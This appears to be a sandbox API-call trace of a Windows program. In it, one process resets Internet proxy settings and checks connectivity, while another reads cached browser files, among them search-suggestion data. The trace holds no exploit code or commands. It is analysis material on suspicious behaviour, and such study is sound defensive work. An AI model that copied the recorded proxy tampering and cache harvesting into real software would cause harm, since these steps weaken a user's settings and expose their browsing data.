| 07:43:40,436 | 1308 | NtCreateFile |
ShareAccess => 1 FileName => c:\autoexec.bat DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000184 |
SUCCESS | 0x00000000 | |
| 07:43:40,436 | 1308 | NtQueryInformationFile |
FileHandle => 0x00000184 FileInformation => \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 07:43:40,436 | 1308 | NtReadFile |
Buffer => FileHandle => 0x00000184 |
SUCCESS | 0x00000000 | |
| 07:43:40,436 | 1308 | RegOpenKeyExW |
Handle => 0x00000184 Registry => 0x00000174 SubKey => Environment |
SUCCESS | 0x00000000 | |
| 07:43:40,436 | 1308 | RegEnumValueW |
Index => 0 Handle => 0x00000184 Data => %\x00U\x00S\x00E\x00R\x00P\x00R\x00O\x00F\x00I\x00L\x00E\x00%\x00\\x00L\x00o\x00c\x00a\x00l\x00 \x00S\x00e\x00t\x00t\x00i\x00n\x00g\x00s\x00\\x00T\x00e\x00m\x00p\x00\x00\x00 ValueName => TEMP |
SUCCESS | 0x00000000 | |
| 07:43:40,436 | 1308 | RegEnumValueW |
Index => 1 Handle => 0x00000184 Data => %\x00U\x00S\x00E\x00R\x00P\x00R\x00O\x00F\x00I\x00L\x00E\x00%\x00\\x00L\x00o\x00c\x00a\x00l\x00 \x00S\x00e\x00t\x00t\x00i\x00n\x00g\x00s\x00\\x00T\x00e\x00m\x00p\x00\x00\x00 ValueName => TMP |
SUCCESS | 0x00000000 | |
| 07:43:40,436 | 1308 | RegEnumValueW |
Index => 2 Handle => 0x00000184 DataLength => 4096 ValueName => TMP Type => 12709440 |
FAILURE | 0x00000103 | |
| 07:43:40,436 | 1308 | RegEnumValueW |
Index => 0 Handle => 0x00000184 Data => %\x00U\x00S\x00E\x00R\x00P\x00R\x00O\x00F\x00I\x00L\x00E\x00%\x00\\x00L\x00o\x00c\x00a\x00l\x00 \x00S\x00e\x00t\x00t\x00i\x00n\x00g\x00s\x00\\x00T\x00e\x00m\x00p\x00\x00\x00 ValueName => TEMP |
SUCCESS | 0x00000000 | |
| 07:43:40,436 | 1308 | FindFirstFileExW |
FileName => C:\Documents and Settings |
SUCCESS | 0x00164f80 | |
| 07:43:40,436 | 1308 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings |
SUCCESS | 0x00164f80 | |
| 07:43:40,436 | 1308 | RegEnumValueW |
Index => 1 Handle => 0x00000184 Data => %\x00U\x00S\x00E\x00R\x00P\x00R\x00O\x00F\x00I\x00L\x00E\x00%\x00\\x00L\x00o\x00c\x00a\x00l\x00 \x00S\x00e\x00t\x00t\x00i\x00n\x00g\x00s\x00\\x00T\x00e\x00m\x00p\x00\x00\x00 ValueName => TMP |
SUCCESS | 0x00000000 | |
| 07:43:40,436 | 1308 | FindFirstFileExW |
FileName => C:\Documents and Settings |
SUCCESS | 0x00164f80 | |
| 07:43:40,436 | 1308 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings |
SUCCESS | 0x00164f80 | |
| 07:43:40,436 | 1308 | RegEnumValueW |
Index => 2 Handle => 0x00000184 DataLength => 4096 ValueName => TMP Type => 12709440 |
FAILURE | 0x00000103 | |
| 07:43:40,436 | 1308 | RegCloseKey |
Handle => 0x00000184 |
SUCCESS | 0x00000000 | |
| 07:43:40,436 | 1308 | RegOpenKeyExW |
Handle => 0x00000184 Registry => 0x00000174 SubKey => Volatile Environment |
SUCCESS | 0x00000000 | |
| 07:43:40,436 | 1308 | RegEnumValueW |
Index => 0 Handle => 0x00000184 Data => \\x00\\x00T\x00U\x00R\x00B\x00O\x00P\x00C\x00\x00\x00 ValueName => LOGONSERVER |
SUCCESS | 0x00000000 | |
| 07:43:40,436 | 1308 | RegEnumValueW |
Index => 1 Handle => 0x00000184 Data => C\x00o\x00n\x00s\x00o\x00l\x00e\x00\x00\x00 ValueName => CLIENTNAME |
SUCCESS | 0x00000000 | |
| 07:43:40,446 | 1308 | RegEnumValueW |
Index => 2 Handle => 0x00000184 Data => C\x00o\x00n\x00s\x00o\x00l\x00e\x00\x00\x00 ValueName => SESSIONNAME |
SUCCESS | 0x00000000 | |
| 07:43:40,446 | 1308 | RegEnumValueW |
Index => 3 Handle => 0x00000184 Data => C\x00:\x00\\x00D\x00o\x00c\x00u\x00m\x00e\x00n\x00t\x00s\x00 \x00a\x00n\x00d\x00 \x00S\x00e\x00t\x00t\x00i\x00n\x00g\x00s\x00\\x00T\x00D\x00W\x00\\x00A\x00p\x00p\x00l\x00i\x00c\x00a\x00t\x00i\x00o\x00n\x00 \x00D\x00a\x00t\x00a\x00\x00\x00 ValueName => APPDATA |
SUCCESS | 0x00000000 | |
| 07:43:40,446 | 1308 | RegEnumValueW |
Index => 4 Handle => 0x00000184 Data => C\x00:\x00\x00\x00 ValueName => HOMEDRIVE |
SUCCESS | 0x00000000 | |
| 07:43:40,446 | 1308 | RegEnumValueW |
Index => 5 Handle => 0x00000184 Data => \x00\x00 ValueName => HOMESHARE |
SUCCESS | 0x00000000 | |
| 07:43:40,446 | 1308 | RegEnumValueW |
Index => 6 Handle => 0x00000184 Data => \\x00D\x00o\x00c\x00u\x00m\x00e\x00n\x00t\x00s\x00 \x00a\x00n\x00d\x00 \x00S\x00e\x00t\x00t\x00i\x00n\x00g\x00s\x00\\x00T\x00D\x00W\x00\x00\x00 ValueName => HOMEPATH |
SUCCESS | 0x00000000 | |
| 07:43:40,446 | 1308 | RegEnumValueW |
Index => 7 Handle => 0x00000184 DataLength => 4096 ValueName => HOMEPATH Type => 12709440 |
FAILURE | 0x00000103 | |
| 07:43:40,446 | 1308 | RegEnumValueW |
Index => 0 Handle => 0x00000184 Data => \\x00\\x00T\x00U\x00R\x00B\x00O\x00P\x00C\x00\x00\x00 ValueName => LOGONSERVER |
SUCCESS | 0x00000000 | |
| 07:43:40,446 | 1308 | RegEnumValueW |
Index => 1 Handle => 0x00000184 Data => C\x00o\x00n\x00s\x00o\x00l\x00e\x00\x00\x00 ValueName => CLIENTNAME |
SUCCESS | 0x00000000 | |
| 07:43:40,446 | 1308 | RegEnumValueW |
Index => 2 Handle => 0x00000184 Data => C\x00o\x00n\x00s\x00o\x00l\x00e\x00\x00\x00 ValueName => SESSIONNAME |
SUCCESS | 0x00000000 | |
| 07:43:40,446 | 1308 | RegEnumValueW |
Index => 3 Handle => 0x00000184 Data => C\x00:\x00\\x00D\x00o\x00c\x00u\x00m\x00e\x00n\x00t\x00s\x00 \x00a\x00n\x00d\x00 \x00S\x00e\x00t\x00t\x00i\x00n\x00g\x00s\x00\\x00T\x00D\x00W\x00\\x00A\x00p\x00p\x00l\x00i\x00c\x00a\x00t\x00i\x00o\x00n\x00 \x00D\x00a\x00t\x00a\x00\x00\x00 ValueName => APPDATA |
SUCCESS | 0x00000000 | |
| 07:43:40,446 | 1308 | RegEnumValueW |
Index => 4 Handle => 0x00000184 Data => C\x00:\x00\x00\x00 ValueName => HOMEDRIVE |
SUCCESS | 0x00000000 | |
| 07:43:40,446 | 1308 | RegEnumValueW |
Index => 5 Handle => 0x00000184 Data => \x00\x00 ValueName => HOMESHARE |
SUCCESS | 0x00000000 | |
| 07:43:40,446 | 1308 | RegEnumValueW |
Index => 6 Handle => 0x00000184 Data => \\x00D\x00o\x00c\x00u\x00m\x00e\x00n\x00t\x00s\x00 \x00a\x00n\x00d\x00 \x00S\x00e\x00t\x00t\x00i\x00n\x00g\x00s\x00\\x00T\x00D\x00W\x00\x00\x00 ValueName => HOMEPATH |
SUCCESS | 0x00000000 | |
| 07:43:40,446 | 1308 | RegEnumValueW |
Index => 7 Handle => 0x00000184 DataLength => 4096 ValueName => HOMEPATH Type => 12709440 |
FAILURE | 0x00000103 | |
| 07:43:40,446 | 1308 | RegCloseKey |
Handle => 0x00000184 |
SUCCESS | 0x00000000 | |
| 07:43:40,446 | 1308 | RegCloseKey |
Handle => 0x00000174 |
SUCCESS | 0x00000000 | |
| 07:43:40,446 | 1308 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00001000 BaseAddress => 0x00cd0000 |
SUCCESS | 0x00000000 | |
| 07:43:40,446 | 1308 | RegCloseKey |
Handle => 0x0000017c |
SUCCESS | 0x00000000 | |
| 07:43:40,456 | 1308 | RegOpenKeyExW |
Handle => 0x0000017c Registry => 0x80000003 SubKey => S-1-5-21-1935655697-1606980848-1060284298-1003 |
SUCCESS | 0x00000000 | |
| 07:43:40,456 | 1308 | RegCreateKeyExW |
Handle => 0x00000174 Access => 33554432 Registry => 0x0000017c Class => SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders |
SUCCESS | 0x00000000 | |
| 07:43:40,456 | 1308 | RegCloseKey |
Handle => 0x0000017c |
SUCCESS | 0x00000000 | |
| 07:43:40,456 | 1308 | RegSetValueExW |
Handle => 0x00000174 Buffer => C\x00:\x00\\x00D\x00o\x00c\x00u\x00m\x00e\x00n\x00t\x00s\x00 \x00a\x00n\x00d\x00 \x00S\x00e\x00t\x00t\x00i\x00n\x00g\x00s\x00\\x00T\x00D\x00W\x00\\x00A\x00p\x00p\x00l\x00i\x00c\x00a\x00t\x00i\x00o\x00n\x00 \x00D\x00a\x00t\x00a\x00\x00\x00 ValueName => AppData Type => 1 |
SUCCESS | 0x00000000 | |
| 07:43:40,456 | 1308 | RegCloseKey |
Handle => 0x00000174 |
SUCCESS | 0x00000000 | |
| 07:43:40,456 | 1308 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Application Data\Microsoft\Network\Connections\Pbk\*.pbk |
SUCCESS | 4294967295 | |
| 07:43:40,456 | 1308 | RegCreateKeyExA |
Handle => 0x00000170 Access => 2 Registry => 0x0000016c Class => SubKey => Software\Microsoft\windows\CurrentVersion\Internet Settings |
SUCCESS | 0x00000000 | |
| 07:43:40,456 | 1308 | RegSetValueExA |
Handle => 0x00000170 Buffer => 1 ValueName => MigrateProxy Type => 4 |
SUCCESS | 0x00000000 | |
| 07:43:40,456 | 1308 | RegCloseKey |
Handle => 0x00000170 |
SUCCESS | 0x00000000 | |
| 07:43:40,456 | 1308 | RegOpenKeyExA |
Handle => 0x00000170 Registry => 0x0000016c SubKey => Software\Microsoft\windows\CurrentVersion\Internet Settings |
SUCCESS | 0x00000000 | |
| 07:43:40,456 | 1308 | RegQueryValueExA |
Handle => 0x00000170 Data => 0 ValueName => ProxyEnable |
SUCCESS | 0x00000000 | |
| 07:43:40,456 | 1308 | RegQueryValueExA |
Handle => 0x00000170 DataLength => 2084 ValueName => ProxyServer Type => 368 |
FAILURE | 0x00000002 | |
| 07:43:40,456 | 1308 | RegQueryValueExA |
Handle => 0x00000170 DataLength => 2084 ValueName => ProxyOverride Type => 368 |
FAILURE | 0x00000002 | |
| 07:43:40,456 | 1308 | RegQueryValueExA |
Handle => 0x00000170 DataLength => 2084 ValueName => AutoConfigURL Type => 368 |
FAILURE | 0x00000002 | |
| 07:43:40,466 | 1308 | RegCloseKey |
Handle => 0x00000170 |
SUCCESS | 0x00000000 | |
| 07:43:40,466 | 1308 | RegCreateKeyExA |
Handle => 0x00000170 Access => 1 Registry => 0x0000016c Class => SubKey => Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections |
SUCCESS | 0x00000000 | |
| 07:43:40,466 | 1308 | RegQueryValueExA |
Handle => 0x00000170 DataLength => 56 ValueName => SavedLegacySettings Type => 3 |
SUCCESS | 0x00000000 | |
| 07:43:40,466 | 1308 | RegQueryValueExA |
Handle => 0x00000170 Data => ValueName => SavedLegacySettings |
SUCCESS | 0x00000000 | |
| 07:43:40,466 | 1308 | RegCloseKey |
Handle => 0x00000170 |
SUCCESS | 0x00000000 | |
| 07:43:40,466 | 1308 | RegCreateKeyExA |
Handle => 0x00000170 Access => 1 Registry => 0x0000016c Class => SubKey => Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections |
SUCCESS | 0x00000000 | |
| 07:43:40,466 | 1308 | RegQueryValueExA |
Handle => 0x00000170 DataLength => 56 ValueName => DefaultConnectionSettings Type => 3 |
SUCCESS | 0x00000000 | |
| 07:43:40,466 | 1308 | RegQueryValueExA |
Handle => 0x00000170 Data => ValueName => DefaultConnectionSettings |
SUCCESS | 0x00000000 | |
| 07:43:40,466 | 1308 | RegCloseKey |
Handle => 0x00000170 |
SUCCESS | 0x00000000 | |
| 07:43:40,466 | 1308 | RegCreateKeyExA |
Handle => 0x00000170 Access => 131078 Registry => 0x0000016c Class => SubKey => Software\Microsoft\windows\CurrentVersion\Internet Settings |
SUCCESS | 0x00000000 | |
| 07:43:40,466 | 1308 | RegSetValueExA |
Handle => 0x00000170 Buffer => 0 ValueName => ProxyEnable Type => 4 |
SUCCESS | 0x00000000 | |
| 07:43:40,466 | 1308 | RegDeleteValueA |
Handle => 0x00000170 ValueName => ProxyServer |
FAILURE | 0x00000002 | |
| 07:43:40,466 | 1308 | RegDeleteValueA |
Handle => 0x00000170 ValueName => ProxyOverride |
FAILURE | 0x00000002 | |
| 07:43:40,466 | 1308 | RegDeleteValueA |
Handle => 0x00000170 ValueName => AutoConfigURL |
FAILURE | 0x00000002 | |
| 07:43:40,466 | 1308 | RegCloseKey |
Handle => 0x00000170 |
SUCCESS | 0x00000000 | |
| 07:43:40,466 | 1308 | RegCreateKeyExA |
Handle => 0x00000174 Access => 2 Registry => 0x80000005 Class => SubKey => Software\Microsoft\windows\CurrentVersion\Internet Settings |
SUCCESS | 0x00000000 | |
| 07:43:40,466 | 1308 | RegSetValueExA |
Handle => 0x00000174 Buffer => 0 ValueName => ProxyEnable Type => 4 |
SUCCESS | 0x00000000 | |
| 07:43:40,466 | 1308 | RegCloseKey |
Handle => 0x00000174 |
SUCCESS | 0x00000000 | |
| 07:43:40,466 | 1308 | RegCreateKeyExA |
Handle => 0x00000174 Access => 1 Registry => 0x0000016c Class => SubKey => Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections |
SUCCESS | 0x00000000 | |
| 07:43:40,466 | 1308 | RegQueryValueExA |
Handle => 0x00000174 DataLength => 56 ValueName => SavedLegacySettings Type => 3 |
SUCCESS | 0x00000000 | |
| 07:43:40,466 | 1308 | RegQueryValueExA |
Handle => 0x00000174 Data => ValueName => SavedLegacySettings |
SUCCESS | 0x00000000 | |
| 07:43:40,466 | 1308 | RegCreateKeyExA |
Handle => 0x0000017c Access => 2 Registry => 0x0000016c Class => SubKey => Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections |
SUCCESS | 0x00000000 | |
| 07:43:40,466 | 1308 | RegCloseKey |
Handle => 0x00000174 |
SUCCESS | 0x00000000 | |
| 07:43:40,466 | 1308 | RegSetValueExA |
Handle => 0x0000017c Buffer => ValueName => SavedLegacySettings Type => 3 |
SUCCESS | 0x00000000 | |
| 07:43:40,466 | 1308 | RegCloseKey |
Handle => 0x0000017c |
SUCCESS | 0x00000000 | |
| 07:43:40,466 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 07:43:40,466 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:43:40,466 | 504 | RegOpenKeyExA |
Handle => 0x00000000 Registry => 0x80000001 SubKey => Software\Microsoft\WAB\WAB4\Wab File Name |
FAILURE | 0x00000002 | |
| 07:43:40,466 | 504 | FindFirstFileExW |
FileName => C:\WINDOWS\Temporary Internet Files\*.* |
SUCCESS | 4294967295 | |
| 07:43:40,466 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\*.* |
SUCCESS | 0x00164f80 | |
| 07:43:40,476 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000017c FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x10\xf5Y\xb9\xd5I\xcd\x01\x90\x83/(\xf2\x91\xcf\x010\xa93\xbb\xd5I\xcd\x01\x10O]\x89X\x94\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00x\x00\x00\x00\x00\x00\x00\x00\x10\xf5Y\xb9\xd5I\xcd\x01\x90\x83/(\xf2\x91\xcf\x01\xe0o\xa69\xd5I\xcd\x01P\xa5o\x89X\x94\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x16\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00C\x00o\x00n\x00t\x00e\x00n\x00t\x00.\x00I\x00E\x005\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90.f\xb9\xd5I\xcd\x01\xb0\xe8f\xec\xdf\x91\xcf\x010\xa93\xbb\xd5I\xcd\x01 |
SUCCESS | 0x00000000 | |
| 07:43:40,476 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:40,556 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\Content.IE5\*.* |
SUCCESS | 0x0016f390 | |
| 07:43:40,556 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000174 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x10\xf5Y\xb9\xd5I\xcd\x01\x90\x83/(\xf2\x91\xcf\x01\xe0o\xa69\xd5I\xcd\x01P\xa5o\x89X\x94\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00p\x00\x00\x00\x00\x00\x00\x00@|[\xb9\xd5I\xcd\x01p\xcb>(\xf2\x91\xcf\x01\xb0\x14\xd6\x86\xe6\x91\xcf\x01\xb0\x14\xd6\x86\xe6\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00A\x009\x003\x00D\x004\x00Q\x00A\x00H\x00\x00\x00x\x00\x00\x00\x00\x00\x00\x00\xc0\xb5g\xb9\xd5I\xcd\x01\xc0\xb5g\xb9\xd5I\xcd\x01\xb0\xe8\xa49\xd5I\xcd\x01\xc0\xb5g\xb9\xd5I\xcd\x01 |
SUCCESS | 0x00000000 | |
| 07:43:40,556 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:40,637 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\Content.IE5\A93D4QAH\*.* |
SUCCESS | 0x0016e590 | |
| 07:43:40,637 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000184 FileInformation => h\x00\x00\x00\x00\x00\x00\x00@|[\xb9\xd5I\xcd\x01p\xcb>(\xf2\x91\xcf\x01\xb0\x14\xd6\x86\xe6\x91\xcf\x01\xb0\x14\xd6\x86\xe6\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00p\x00\x00\x00\x00\x00\x00\x00\x10\xf1L]\xe0\x91\xcf\x01@xN]\xe0\x91\xcf\x01@xN]\xe0\x91\xcf\x01@xN]\xe0\x91\xcf\x01)\x00\x00\x00\x00\x00\x00\x000\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x10\x001\x005\x008\x001\x005\x00_\x00~\x001\x00\x00\x00\x00\x00\x00\x00\x00\x001\x005\x008\x001\x005\x00[\x001\x00]\x00\x00\x00\xa8\x00\x00\x00\x00\x00\x00\x00`b\xcc\xef\xdf\x91\xcf\x01`b\xcc\xef\xdf\x91\xcf\x01`b\xcc\xef\xdf\x91\xcf\x01`b\xcc\xef\xdf\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:43:40,707 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\Content.IE5\A93D4QAH\15815[1] DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:40,707 | 504 | NtReadFile |
Buffer => var bk_results = {
"campaigns": [
]
};
FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:40,707 | 504 | NtReadFile |
Buffer => FileHandle => 0x00000180 |
FAILURE | 3221225489 | |
| 07:43:40,707 | 504 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x0000f000 BaseAddress => 0x00170000 |
SUCCESS | 0x00000000 | |
| 07:43:40,797 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\Content.IE5\A93D4QAH\activityi;src=2542116;type=clien612;cat=chromx;ord=5776331011308[1].htm DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:40,807 | 504 | NtReadFile |
Buffer => <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><div style="display:inline;">
<img height="1" width="1" style="border-style: FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:40,807 | 504 | NtReadFile |
Buffer => FileHandle => 0x00000180 |
FAILURE | 3221225489 | |
| 07:43:40,817 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000184 FileInformation => \x88\x00\x00\x00\x00\x00\x00\x00\xa0yc\x86\xe6\x91\xcf\x01\xd0\xcc\xc6\x86\xe6\x91\xcf\x01\xd0\xcc\xc6\x86\xe6\x91\xcf\x01\xd0\xcc\xc6\x86\xe6\x91\xcf\x01"\x01\x00\x00\x00\x00\x00\x00(\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00$\x00\x00\x00\x00\x00\x00\x00\x18\x00B\x00U\x00C\x00C\x00E\x007\x00~\x001\x00.\x00P\x00N\x00G\x00b\x00u\x00t\x00t\x00o\x00n\x00-\x00l\x00e\x00f\x00t\x00[\x003\x00]\x00.\x00p\x00n\x00g\x00N]\xe0\x91\xcf\x01\x88\x00\x00\x00\x00\x00\x00\x00\xc0\x8a\x9d\x86\xe6\x91\xcf\x01P\x06\xd3\x86\xe6\x91\xcf\x01P\x06\xd3\x86\xe6\x91\xcf\x01P\x06\xd3\x86\xe6\x91\xcf\x01"\x01\x00\x00\x00\x00\x00\x00(\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00$\x00\x00\x00\x00\x00\x00\x00\x18\x00B\x00U\x00C\x000\x00F\x007\x00~\x001\x00.\x00P\x00N\x00G\x00b\x00u\x00t\x00t\x00o\x00n\x00-\x00l\x00e\x00f\x00t\x00[\x004\x00 |
SUCCESS | 0x00000000 | |
| 07:43:40,847 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\Content.IE5\A93D4QAH\eula_text[1].htm DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:40,877 | 504 | NtReadFile |
Buffer => <!DOCTYPE html>
<html class="no-js consumer" lang="en">
<head>
<script>
(function(e, p){
var m = location.href.match(/platform=(win8|win|mac|linux|cros)/);
e.id = (m && m[1]) ||
(p.indexOf('Windows NT 6.2') > -1 ? 'win8' : p.index FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:41,217 | 504 | NtReadFile |
Buffer => <p>
Google Chrome may include one or more components provided by Adobe Systems Incorporated
and Adobe Software Ireland Limited (collectively \xe2\x80\x9cAdobe\xe2\x80\x9d). Your use of the Adobe software
as provided by Google (\xe2\x80\x9cAdobe So FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:41,268 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:43:41,268 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:43:41,268 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:43:41,268 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:43:41,268 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:43:41,278 | 504 | NtReadFile |
Buffer => FileHandle => 0x00000180 |
FAILURE | 3221225489 | |
| 07:43:41,278 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\Content.IE5\A93D4QAH\f[2].txt DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:41,278 | 504 | NtReadFile |
Buffer => window.google.ac.h(["c",[["c\u003cb\u003eraigslist\u003c\/b\u003e",0],["c\u003cb\u003eraigslist baltimore\u003c\/b\u003e",0],["c\u003cb\u003enn\u003c\/b\u003e",0],["c\u003cb\u003eomcast\u003c\/b\u003e",0],["c\u003cb\u003eapital one\u003c\/b\u003e",0],["c\u FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:41,278 | 504 | NtReadFile |
Buffer => FileHandle => 0x00000180 |
FAILURE | 3221225489 | |
| 07:43:41,278 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\Content.IE5\A93D4QAH\f[3].txt DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:41,278 | 504 | NtReadFile |
Buffer => window.google.ac.h(["chrom",[["chrom\u003cb\u003ee\u003c\/b\u003e",0],["chrom\u003cb\u003eecast\u003c\/b\u003e",0],["chrom\u003cb\u003eecast apps\u003c\/b\u003e",0],["chrom\u003cb\u003ee store\u003c\/b\u003e",0],["chrom\u003cb\u003eebook\u003c\/b\u003e",0] FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:41,288 | 504 | NtReadFile |
Buffer => FileHandle => 0x00000180 |
FAILURE | 3221225489 | |
| 07:43:41,288 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\Content.IE5\A93D4QAH\google[1].htm DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:41,308 | 504 | NtReadFile |
Buffer => <!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta content="text/html; charset=UTF-8" http-equiv="content-type"><meta content="Search the world's information, including webpages, images, videos and more. Google has FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:41,358 | 504 | NtReadFile |
Buffer => FileHandle => 0x00000180 |
FAILURE | 3221225489 | |
| 07:43:41,358 | 504 | NtQueryDirectoryFile |
